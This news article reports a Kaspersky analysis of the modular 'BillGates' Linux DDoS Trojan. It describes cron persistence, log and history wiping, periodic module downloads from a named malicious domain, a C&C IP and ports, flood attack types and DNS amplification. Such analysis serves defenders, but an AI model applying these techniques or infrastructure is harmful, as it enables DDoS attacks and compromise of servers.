More details are emerging regarding the Linux DDoS (distributed denial of service) Trojan, researchers said.
“The capability that we found the most interesting was the Trojan’s ability to conduct DNS Amplification-type attacks,” said Kaspersky Lab’s Mikhail Kuzin, a malware analyst at Kaspersky Lab who said they came across an article published in February on a Russian IT website entitled, ‘Studying the BillGates Linux Botnet.’ “In addition, it followed from the article that the Trojan had a sophisticated modular structure, something we had not seen in the world of Linux malware before.”
The article provided a link to download all of the Trojan’s files. The archive contained files that were all modules of the same Trojan: atddd; cupsdd; cupsddh; ksapdd; kysapdd; skysapdd; and xfsdxd. The files cupsdd and cupsddh ended up detected by Kaspersky Lab as Backdoor.Linux.Ganiw.a, while atddd and the remaining files are Backdoor.Linux.Mayday.f. The archive with the files also contained a configuration file for cron — the Linux task scheduler. In this case, the utility is able to get a foothold on the system, Kuzin said in a blog post.
Trojan uses cron to perform tests. Once a minute it terminates the processes of all applications that can interfere with its operation: .IptabLes, nfsd4, profild.key, nfsd, DDosl, lengchao32, b26, codelove and node24. In addition, once every 90 minutes it terminates all of its processes, and every two hours it downloads all of its components to the /etc folder from http://www.dgnfd564sdf.com:8080/[module_name] (module_name = name of the Trojan’s module, e.g., cupsdd), after deleting these files from the /etc folder. It also re-launches all of its modules every 90 minutes and purges system logs and bash command history and execute chmod 7777 [module_name] every minute.
“During subsequent analysis of the files, we did not find any code responsible for saving the config file for cron,” Kuzin said. “Most likely, the file was manually downloaded to the victim machine by a cybercriminal after gaining remote access to the system.”
The file atddd is a backdoor designed to conduct various types of DDoS attacks against the servers specified. The backdoor begins by calling the function daemon(1, 0), continuing to run in the background and redirecting standard input, output and errors to /dev/null, Kuzin said. Next it collects information about the system, and then decrypts strings defining the command and control server’s IP address and port number.
Eventually, the C&C passes along commands to attack using UDP floods, TCP floods, ICMP floods and DNS flood attacks.
Cupsdd (Backdoor.Linux.Ganiw.a) can also carry out various types of DDoS attacks, but is more feature-rich and sophisticated, Kuzin said. In the case of Cupsddh, also detected as Backdoor.Linux.Ganiw.a, includes an attack that allows for DNS amplification.
“The last attack type on the list above is different in that packets are sent to vulnerable DNS servers, with the attack target specified as the sender’s IP address,” Kuzin said. “As a result, the cybercriminal sends a small packet with a DNS request and the DNS server responds to the attack target with a significantly larger packet. The list of vulnerable DNS servers is stored in the file libamplify.so, which is written to disk following the relevant command from the C&C.”
In addition, an updated a version of the Trojan has appeared with new functions. The most significant changes ended up made to the Gates module — cupsdd. It now has three modes — the installation and update mode; the monitoring mode, where it writes the PID of the current process to the file /tmp/moni.lock and starts threads to monitor the Bill module and the Gates module in controlling the Bill module. The final mode is for controlling the Bill module and operates the exact same way as it did in the previous version of the Trojan.
“To summarize, in the new version of the Trojan its authors have added a little ‘robustness’ without making any significant functionality changes,” Kuzin blogged. “It is also worth noting that the hard-coded IP address of the C&C server has remained the same (22.214.171.124) in this version, but the port number has changed — it is now 36008 instead of 30000 in the previous version.”